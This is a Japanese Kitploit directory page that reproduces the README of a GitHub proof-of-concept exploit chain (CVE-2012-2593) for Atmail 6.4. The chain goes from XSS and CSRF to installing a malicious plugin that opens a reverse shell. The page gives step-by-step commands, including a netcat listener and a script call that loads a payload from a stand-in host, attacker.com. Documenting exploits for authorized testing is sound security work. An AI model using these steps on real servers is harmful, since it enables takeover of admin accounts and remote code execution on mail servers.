Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/andrewtrube/cve-2012-2593
エクスプロイトフレームワークペイロード生成エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubandrewtrube/cve-2012-2593

CVE-2012-2593

Atmail XSS-CSRF-RCE エクスプロイトチェーン

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Atmail XSS-CSRF-RCE エクスプロイトチェーン PoC

atmail-rce.py: AtmailのWebメールインターフェースにおけるCVE-2012-2593を悪用します。

atmail-csrf.js: CVE 2012-2593をCSRFに利用し、リバースシェルを実行する悪意のあるプラグインをインストールするJavaScriptファイル

Plugin.php: インストールされるAtmailプラグイン。リバースシェルを呼び出します。

!!テストの許可があるサーバーに対してのみ使用してください

概要

Atmailメールサーバーバージョン6.4には、Dateメールヘッダーとメール本文(iFrameインジェクションを介して)の両方にXSS脆弱性があります。これは、JavaScript XHR APIを使用して管理者ユーザーのCookieを含むリクエストを管理Webパネルに送信し、リバースシェルを実行するコードを実行する悪意のあるプラグインをインストールするCSRFに利用されます。

概念実証

  1. netcatリスナーを起動します nc -lvp 4444
  2. Plugin.phpを開き、IPアドレスとポートをnetcatリスナーのものに変更します
  3. Pluginをgzipで圧縮し、base64でエンコードします gzip -c Plugin.php | base64 | tr -d [:space:]
  4. 上記の出力をコピーしてatmail-csrf.jsのdata変数に貼り付けます
  5. atmail-rce.pyスクリプトを実行します python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/
  6. 管理者ユーザーがメールにログインするのを待ちます

注意事項

  • XSSのターゲットがAtmailの管理者ユーザーである場合のみ機能します
  • ターゲットがWebメールインターフェースとサーバーの管理インターフェースの両方にサインインしている場合のみ機能します
  • サーバーでプラグインのインストールが許可されている場合のみ機能します(デフォルトでオン)
ツールをダウンロード